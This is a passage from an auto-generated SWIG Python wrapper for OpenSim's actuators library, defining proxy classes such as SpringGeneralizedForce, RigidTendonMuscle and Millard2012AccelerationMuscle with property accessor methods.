__swig_destroy__ = _actuators.delete_ClutchedPathSpring
__del__ = lambda self: None
ClutchedPathSpring_swigregister = _actuators.ClutchedPathSpring_swigregister
ClutchedPathSpring_swigregister(ClutchedPathSpring)
def ClutchedPathSpring_safeDownCast(obj):
"""
ClutchedPathSpring_safeDownCast(OpenSimObject obj) -> ClutchedPathSpring
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.ClutchedPathSpring_safeDownCast(obj)
def ClutchedPathSpring_getClassName():
"""ClutchedPathSpring_getClassName() -> std::string const &"""
return _actuators.ClutchedPathSpring_getClassName()
class SpringGeneralizedForce(opensim.simulation.Force):
"""Proxy of C++ OpenSim::SpringGeneralizedForce class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.Force]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SpringGeneralizedForce, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.Force]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SpringGeneralizedForce, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> SpringGeneralizedForce
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.SpringGeneralizedForce_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(SpringGeneralizedForce self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.SpringGeneralizedForce_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.SpringGeneralizedForce_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(SpringGeneralizedForce self) -> SpringGeneralizedForce
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(SpringGeneralizedForce self) -> std::string const &
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_getConcreteClassName(self)
def copyProperty_coordinate(self, source):
"""
copyProperty_coordinate(SpringGeneralizedForce self, SpringGeneralizedForce source)
Parameters
----------
source: OpenSim::SpringGeneralizedForce::Self const &
"""
return _actuators.SpringGeneralizedForce_copyProperty_coordinate(self, source)
def append_coordinate(self, value):
"""
append_coordinate(SpringGeneralizedForce self, std::string const & value) -> int
Parameters
----------
value: std::string const &
"""
return _actuators.SpringGeneralizedForce_append_coordinate(self, value)
def constructProperty_coordinate(self, *args):
"""
constructProperty_coordinate(SpringGeneralizedForce self)
constructProperty_coordinate(SpringGeneralizedForce self, std::string const & initValue)
Parameters
----------
initValue: std::string const &
"""
return _actuators.SpringGeneralizedForce_constructProperty_coordinate(self, *args)
def get_coordinate(self, *args):
"""
get_coordinate(SpringGeneralizedForce self, int i) -> std::string const
Parameters
----------
i: int
get_coordinate(SpringGeneralizedForce self) -> std::string const &
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_get_coordinate(self, *args)
def upd_coordinate(self, *args):
"""
upd_coordinate(SpringGeneralizedForce self, int i) -> std::string
Parameters
----------
i: int
upd_coordinate(SpringGeneralizedForce self) -> std::string &
Parameters
----------
self: OpenSim::SpringGeneralizedForce *
"""
return _actuators.SpringGeneralizedForce_upd_coordinate(self, *args)
def set_coordinate(self, *args):
"""
set_coordinate(SpringGeneralizedForce self, int i, std::string const & value)
Parameters
----------
i: int
value: std::string const &
set_coordinate(SpringGeneralizedForce self, std::string const & value)
Parameters
----------
value: std::string const &
"""
return _actuators.SpringGeneralizedForce_set_coordinate(self, *args)
def copyProperty_stiffness(self, source):
"""
copyProperty_stiffness(SpringGeneralizedForce self, SpringGeneralizedForce source)
Parameters
----------
source: OpenSim::SpringGeneralizedForce::Self const &
"""
return _actuators.SpringGeneralizedForce_copyProperty_stiffness(self, source)
def append_stiffness(self, value):
"""
append_stiffness(SpringGeneralizedForce self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.SpringGeneralizedForce_append_stiffness(self, value)
def constructProperty_stiffness(self, initValue):
"""
constructProperty_stiffness(SpringGeneralizedForce self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.SpringGeneralizedForce_constructProperty_stiffness(self, initValue)
def get_stiffness(self, *args):
"""
get_stiffness(SpringGeneralizedForce self, int i) -> double const
Parameters
----------
i: int
get_stiffness(SpringGeneralizedForce self) -> double const &
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_get_stiffness(self, *args)
def upd_stiffness(self, *args):
"""
upd_stiffness(SpringGeneralizedForce self, int i) -> double
Parameters
----------
i: int
upd_stiffness(SpringGeneralizedForce self) -> double &
Parameters
----------
self: OpenSim::SpringGeneralizedForce *
"""
return _actuators.SpringGeneralizedForce_upd_stiffness(self, *args)
def set_stiffness(self, *args):
"""
set_stiffness(SpringGeneralizedForce self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_stiffness(SpringGeneralizedForce self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.SpringGeneralizedForce_set_stiffness(self, *args)
def copyProperty_rest_length(self, source):
"""
copyProperty_rest_length(SpringGeneralizedForce self, SpringGeneralizedForce source)
Parameters
----------
source: OpenSim::SpringGeneralizedForce::Self const &
"""
return _actuators.SpringGeneralizedForce_copyProperty_rest_length(self, source)
def append_rest_length(self, value):
"""
append_rest_length(SpringGeneralizedForce self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.SpringGeneralizedForce_append_rest_length(self, value)
def constructProperty_rest_length(self, initValue):
"""
constructProperty_rest_length(SpringGeneralizedForce self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.SpringGeneralizedForce_constructProperty_rest_length(self, initValue)
def get_rest_length(self, *args):
"""
get_rest_length(SpringGeneralizedForce self, int i) -> double const
Parameters
----------
i: int
get_rest_length(SpringGeneralizedForce self) -> double const &
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_get_rest_length(self, *args)
def upd_rest_length(self, *args):
"""
upd_rest_length(SpringGeneralizedForce self, int i) -> double
Parameters
----------
i: int
upd_rest_length(SpringGeneralizedForce self) -> double &
Parameters
----------
self: OpenSim::SpringGeneralizedForce *
"""
return _actuators.SpringGeneralizedForce_upd_rest_length(self, *args)
def set_rest_length(self, *args):
"""
set_rest_length(SpringGeneralizedForce self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_rest_length(SpringGeneralizedForce self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.SpringGeneralizedForce_set_rest_length(self, *args)
def copyProperty_viscosity(self, source):
"""
copyProperty_viscosity(SpringGeneralizedForce self, SpringGeneralizedForce source)
Parameters
----------
source: OpenSim::SpringGeneralizedForce::Self const &
"""
return _actuators.SpringGeneralizedForce_copyProperty_viscosity(self, source)
def append_viscosity(self, value):
"""
append_viscosity(SpringGeneralizedForce self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.SpringGeneralizedForce_append_viscosity(self, value)
def constructProperty_viscosity(self, initValue):
"""
constructProperty_viscosity(SpringGeneralizedForce self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.SpringGeneralizedForce_constructProperty_viscosity(self, initValue)
def get_viscosity(self, *args):
"""
get_viscosity(SpringGeneralizedForce self, int i) -> double const
Parameters
----------
i: int
get_viscosity(SpringGeneralizedForce self) -> double const &
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_get_viscosity(self, *args)
def upd_viscosity(self, *args):
"""
upd_viscosity(SpringGeneralizedForce self, int i) -> double
Parameters
----------
i: int
upd_viscosity(SpringGeneralizedForce self) -> double &
Parameters
----------
self: OpenSim::SpringGeneralizedForce *
"""
return _actuators.SpringGeneralizedForce_upd_viscosity(self, *args)
def set_viscosity(self, *args):
"""
set_viscosity(SpringGeneralizedForce self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_viscosity(SpringGeneralizedForce self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.SpringGeneralizedForce_set_viscosity(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::SpringGeneralizedForce self, std::string const & coordinateName) -> SpringGeneralizedForce
Parameters
----------
coordinateName: std::string const &
__init__(OpenSim::SpringGeneralizedForce self) -> SpringGeneralizedForce
"""
this = _actuators.new_SpringGeneralizedForce(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setStiffness(self, aStiffness):
"""
setStiffness(SpringGeneralizedForce self, double aStiffness)
Parameters
----------
aStiffness: double
"""
return _actuators.SpringGeneralizedForce_setStiffness(self, aStiffness)
def getStiffness(self):
"""
getStiffness(SpringGeneralizedForce self) -> double
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_getStiffness(self)
def setRestLength(self, aRestLength):
"""
setRestLength(SpringGeneralizedForce self, double aRestLength)
Parameters
----------
aRestLength: double
"""
return _actuators.SpringGeneralizedForce_setRestLength(self, aRestLength)
def getRestLength(self):
"""
getRestLength(SpringGeneralizedForce self) -> double
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_getRestLength(self)
def setViscosity(self, aViscosity):
"""
setViscosity(SpringGeneralizedForce self, double aViscosity)
Parameters
----------
aViscosity: double
"""
return _actuators.SpringGeneralizedForce_setViscosity(self, aViscosity)
def getViscosity(self):
"""
getViscosity(SpringGeneralizedForce self) -> double
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_getViscosity(self)
def getRecordLabels(self):
"""
getRecordLabels(SpringGeneralizedForce self) -> ArrayStr
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_getRecordLabels(self)
def getRecordValues(self, state):
"""
getRecordValues(SpringGeneralizedForce self, State state) -> ArrayDouble
Parameters
----------
state: SimTK::State const &
"""
return _actuators.SpringGeneralizedForce_getRecordValues(self, state)
__swig_destroy__ = _actuators.delete_SpringGeneralizedForce
__del__ = lambda self: None
SpringGeneralizedForce_swigregister = _actuators.SpringGeneralizedForce_swigregister
SpringGeneralizedForce_swigregister(SpringGeneralizedForce)
def SpringGeneralizedForce_safeDownCast(obj):
"""
SpringGeneralizedForce_safeDownCast(OpenSimObject obj) -> SpringGeneralizedForce
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.SpringGeneralizedForce_safeDownCast(obj)
def SpringGeneralizedForce_getClassName():
"""SpringGeneralizedForce_getClassName() -> std::string const &"""
return _actuators.SpringGeneralizedForce_getClassName()
class RigidTendonMuscle(opensim.simulation.Muscle):
"""Proxy of C++ OpenSim::RigidTendonMuscle class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.Muscle]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, RigidTendonMuscle, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.Muscle]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, RigidTendonMuscle, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> RigidTendonMuscle
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.RigidTendonMuscle_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(RigidTendonMuscle self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.RigidTendonMuscle_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.RigidTendonMuscle_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(RigidTendonMuscle self) -> RigidTendonMuscle
Parameters
----------
self: OpenSim::RigidTendonMuscle const *
"""
return _actuators.RigidTendonMuscle_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(RigidTendonMuscle self) -> std::string const &
Parameters
----------
self: OpenSim::RigidTendonMuscle const *
"""
return _actuators.RigidTendonMuscle_getConcreteClassName(self)
def copyProperty_active_force_length_curve(self, source):
"""
copyProperty_active_force_length_curve(RigidTendonMuscle self, RigidTendonMuscle source)
Parameters
----------
source: OpenSim::RigidTendonMuscle::Self const &
"""
return _actuators.RigidTendonMuscle_copyProperty_active_force_length_curve(self, source)
def append_active_force_length_curve(self, value):
"""
append_active_force_length_curve(RigidTendonMuscle self, Function value) -> int
Parameters
----------
value: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_append_active_force_length_curve(self, value)
def constructProperty_active_force_length_curve(self, initValue):
"""
constructProperty_active_force_length_curve(RigidTendonMuscle self, Function initValue)
Parameters
----------
initValue: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_constructProperty_active_force_length_curve(self, initValue)
def get_active_force_length_curve(self, *args):
"""
get_active_force_length_curve(RigidTendonMuscle self, int i) -> Function
Parameters
----------
i: int
get_active_force_length_curve(RigidTendonMuscle self) -> Function
Parameters
----------
self: OpenSim::RigidTendonMuscle const *
"""
return _actuators.RigidTendonMuscle_get_active_force_length_curve(self, *args)
def upd_active_force_length_curve(self, *args):
"""
upd_active_force_length_curve(RigidTendonMuscle self, int i) -> Function
Parameters
----------
i: int
upd_active_force_length_curve(RigidTendonMuscle self) -> Function
Parameters
----------
self: OpenSim::RigidTendonMuscle *
"""
return _actuators.RigidTendonMuscle_upd_active_force_length_curve(self, *args)
def set_active_force_length_curve(self, *args):
"""
set_active_force_length_curve(RigidTendonMuscle self, int i, Function value)
Parameters
----------
i: int
value: OpenSim::Function const &
set_active_force_length_curve(RigidTendonMuscle self, Function value)
Parameters
----------
value: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_set_active_force_length_curve(self, *args)
def copyProperty_passive_force_length_curve(self, source):
"""
copyProperty_passive_force_length_curve(RigidTendonMuscle self, RigidTendonMuscle source)
Parameters
----------
source: OpenSim::RigidTendonMuscle::Self const &
"""
return _actuators.RigidTendonMuscle_copyProperty_passive_force_length_curve(self, source)
def append_passive_force_length_curve(self, value):
"""
append_passive_force_length_curve(RigidTendonMuscle self, Function value) -> int
Parameters
----------
value: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_append_passive_force_length_curve(self, value)
def constructProperty_passive_force_length_curve(self, initValue):
"""
constructProperty_passive_force_length_curve(RigidTendonMuscle self, Function initValue)
Parameters
----------
initValue: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_constructProperty_passive_force_length_curve(self, initValue)
def get_passive_force_length_curve(self, *args):
"""
get_passive_force_length_curve(RigidTendonMuscle self, int i) -> Function
Parameters
----------
i: int
get_passive_force_length_curve(RigidTendonMuscle self) -> Function
Parameters
----------
self: OpenSim::RigidTendonMuscle const *
"""
return _actuators.RigidTendonMuscle_get_passive_force_length_curve(self, *args)
def upd_passive_force_length_curve(self, *args):
"""
upd_passive_force_length_curve(RigidTendonMuscle self, int i) -> Function
Parameters
----------
i: int
upd_passive_force_length_curve(RigidTendonMuscle self) -> Function
Parameters
----------
self: OpenSim::RigidTendonMuscle *
"""
return _actuators.RigidTendonMuscle_upd_passive_force_length_curve(self, *args)
def set_passive_force_length_curve(self, *args):
"""
set_passive_force_length_curve(RigidTendonMuscle self, int i, Function value)
Parameters
----------
i: int
value: OpenSim::Function const &
set_passive_force_length_curve(RigidTendonMuscle self, Function value)
Parameters
----------
value: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_set_passive_force_length_curve(self, *args)
def copyProperty_force_velocity_curve(self, source):
"""
copyProperty_force_velocity_curve(RigidTendonMuscle self, RigidTendonMuscle source)
Parameters
----------
source: OpenSim::RigidTendonMuscle::Self const &
"""
return _actuators.RigidTendonMuscle_copyProperty_force_velocity_curve(self, source)
def append_force_velocity_curve(self, value):
"""
append_force_velocity_curve(RigidTendonMuscle self, Function value) -> int
Parameters
----------
value: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_append_force_velocity_curve(self, value)
def constructProperty_force_velocity_curve(self, initValue):
"""
constructProperty_force_velocity_curve(RigidTendonMuscle self, Function initValue)
Parameters
----------
initValue: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_constructProperty_force_velocity_curve(self, initValue)
def get_force_velocity_curve(self, *args):
"""
get_force_velocity_curve(RigidTendonMuscle self, int i) -> Function
Parameters
----------
i: int
get_force_velocity_curve(RigidTendonMuscle self) -> Function
Parameters
----------
self: OpenSim::RigidTendonMuscle const *
"""
return _actuators.RigidTendonMuscle_get_force_velocity_curve(self, *args)
def upd_force_velocity_curve(self, *args):
"""
upd_force_velocity_curve(RigidTendonMuscle self, int i) -> Function
Parameters
----------
i: int
upd_force_velocity_curve(RigidTendonMuscle self) -> Function
Parameters
----------
self: OpenSim::RigidTendonMuscle *
"""
return _actuators.RigidTendonMuscle_upd_force_velocity_curve(self, *args)
def set_force_velocity_curve(self, *args):
"""
set_force_velocity_curve(RigidTendonMuscle self, int i, Function value)
Parameters
----------
i: int
value: OpenSim::Function const &
set_force_velocity_curve(RigidTendonMuscle self, Function value)
Parameters
----------
value: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_set_force_velocity_curve(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::RigidTendonMuscle self) -> RigidTendonMuscle
__init__(OpenSim::RigidTendonMuscle self, std::string const & name, double maxIsometricForce, double optimalFiberLength, double tendonSlackLength, double pennationAngle) -> RigidTendonMuscle
Parameters
----------
name: std::string const &
maxIsometricForce: double
optimalFiberLength: double
tendonSlackLength: double
pennationAngle: double
"""
this = _actuators.new_RigidTendonMuscle(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setActivation(self, s, activation):
"""
setActivation(RigidTendonMuscle self, State s, double activation)
Parameters
----------
s: SimTK::State &
activation: double
"""
return _actuators.RigidTendonMuscle_setActivation(self, s, activation)
__swig_destroy__ = _actuators.delete_RigidTendonMuscle
__del__ = lambda self: None
RigidTendonMuscle_swigregister = _actuators.RigidTendonMuscle_swigregister
RigidTendonMuscle_swigregister(RigidTendonMuscle)
def RigidTendonMuscle_safeDownCast(obj):
"""
RigidTendonMuscle_safeDownCast(OpenSimObject obj) -> RigidTendonMuscle
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.RigidTendonMuscle_safeDownCast(obj)
def RigidTendonMuscle_getClassName():
"""RigidTendonMuscle_getClassName() -> std::string const &"""
return _actuators.RigidTendonMuscle_getClassName()
class Millard2012AccelerationMuscle(opensim.simulation.Muscle):
"""Proxy of C++ OpenSim::Millard2012AccelerationMuscle class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.Muscle]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Millard2012AccelerationMuscle, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.Muscle]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Millard2012AccelerationMuscle, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> Millard2012AccelerationMuscle
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.Millard2012AccelerationMuscle_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(Millard2012AccelerationMuscle self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.Millard2012AccelerationMuscle_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.Millard2012AccelerationMuscle_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(Millard2012AccelerationMuscle self) -> Millard2012AccelerationMuscle
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(Millard2012AccelerationMuscle self) -> std::string const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getConcreteClassName(self)
def copyProperty_default_activation(self, source):
"""
copyProperty_default_activation(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_default_activation(self, source)
def append_default_activation(self, value):
"""
append_default_activation(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_default_activation(self, value)
def constructProperty_default_activation(self, initValue):
"""
constructProperty_default_activation(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_default_activation(self, initValue)
def get_default_activation(self, *args):
"""
get_default_activation(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_default_activation(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_default_activation(self, *args)
def upd_default_activation(self, *args):
"""
upd_default_activation(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_default_activation(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_default_activation(self, *args)
def set_default_activation(self, *args):
"""
set_default_activation(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_default_activation(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_default_activation(self, *args)
def copyProperty_default_fiber_length(self, source):
"""
copyProperty_default_fiber_length(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_default_fiber_length(self, source)
def append_default_fiber_length(self, value):
"""
append_default_fiber_length(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_default_fiber_length(self, value)
def constructProperty_default_fiber_length(self, initValue):
"""
constructProperty_default_fiber_length(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_default_fiber_length(self, initValue)
def get_default_fiber_length(self, *args):
"""
get_default_fiber_length(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_default_fiber_length(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_default_fiber_length(self, *args)
def upd_default_fiber_length(self, *args):
"""
upd_default_fiber_length(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_default_fiber_length(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_default_fiber_length(self, *args)
def set_default_fiber_length(self, *args):
"""
set_default_fiber_length(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_default_fiber_length(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_default_fiber_length(self, *args)
def copyProperty_default_fiber_velocity(self, source):
"""
copyProperty_default_fiber_velocity(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_default_fiber_velocity(self, source)
def append_default_fiber_velocity(self, value):
"""
append_default_fiber_velocity(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_default_fiber_velocity(self, value)
def constructProperty_default_fiber_velocity(self, initValue):
"""
constructProperty_default_fiber_velocity(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_default_fiber_velocity(self, initValue)
def get_default_fiber_velocity(self, *args):
"""
get_default_fiber_velocity(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_default_fiber_velocity(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_default_fiber_velocity(self, *args)
def upd_default_fiber_velocity(self, *args):
"""
upd_default_fiber_velocity(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_default_fiber_velocity(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_default_fiber_velocity(self, *args)
def set_default_fiber_velocity(self, *args):
"""
set_default_fiber_velocity(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_default_fiber_velocity(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_default_fiber_velocity(self, *args)
def copyProperty_MuscleFirstOrderActivationDynamicModel(self, source):
"""
copyProperty_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_MuscleFirstOrderActivationDynamicModel(self, source)
def append_MuscleFirstOrderActivationDynamicModel(self, value):
"""
append_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self, MuscleFirstOrderActivationDynamicModel value) -> int
Parameters
----------
value: OpenSim::MuscleFirstOrderActivationDynamicModel const &
"""
return _actuators.Millard2012AccelerationMuscle_append_MuscleFirstOrderActivationDynamicModel(self, value)
def constructProperty_MuscleFirstOrderActivationDynamicModel(self, initValue):
"""
constructProperty_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self, MuscleFirstOrderActivationDynamicModel initValue)
Parameters
----------
initValue: OpenSim::MuscleFirstOrderActivationDynamicModel const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_MuscleFirstOrderActivationDynamicModel(self, initValue)
def get_MuscleFirstOrderActivationDynamicModel(self, *args):
"""
get_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self, int i) -> MuscleFirstOrderActivationDynamicModel
Parameters
----------
i: int
get_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self) -> MuscleFirstOrderActivationDynamicModel
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_MuscleFirstOrderActivationDynamicModel(self, *args)
def upd_MuscleFirstOrderActivationDynamicModel(self, *args):
"""
upd_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self, int i) -> MuscleFirstOrderActivationDynamicModel
Parameters
----------
i: int
upd_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self) -> MuscleFirstOrderActivationDynamicModel
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_MuscleFirstOrderActivationDynamicModel(self, *args)
def set_MuscleFirstOrderActivationDynamicModel(self, *args):
"""
set_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self, int i, MuscleFirstOrderActivationDynamicModel value)
Parameters
----------
i: int
value: OpenSim::MuscleFirstOrderActivationDynamicModel const &
set_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self, MuscleFirstOrderActivationDynamicModel value)
Parameters
----------
value: OpenSim::MuscleFirstOrderActivationDynamicModel const &
"""
return _actuators.Millard2012AccelerationMuscle_set_MuscleFirstOrderActivationDynamicModel(self, *args)
def copyProperty_ActiveForceLengthCurve(self, source):
"""
copyProperty_ActiveForceLengthCurve(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_ActiveForceLengthCurve(self, source)
def append_ActiveForceLengthCurve(self, value):
"""
append_ActiveForceLengthCurve(Millard2012AccelerationMuscle self, ActiveForceLengthCurve value) -> int
Parameters
----------
value: OpenSim::ActiveForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_append_ActiveForceLengthCurve(self, value)
def constructProperty_ActiveForceLengthCurve(self, initValue):
"""
constructProperty_ActiveForceLengthCurve(Millard2012AccelerationMuscle self, ActiveForceLengthCurve initValue)
Parameters
----------
initValue: OpenSim::ActiveForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_ActiveForceLengthCurve(self, initValue)
def get_ActiveForceLengthCurve(self, *args):
"""
get_ActiveForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> ActiveForceLengthCurve
Parameters
----------
i: int
get_ActiveForceLengthCurve(Millard2012AccelerationMuscle self) -> ActiveForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_ActiveForceLengthCurve(self, *args)
def upd_ActiveForceLengthCurve(self, *args):
"""
upd_ActiveForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> ActiveForceLengthCurve
Parameters
----------
i: int
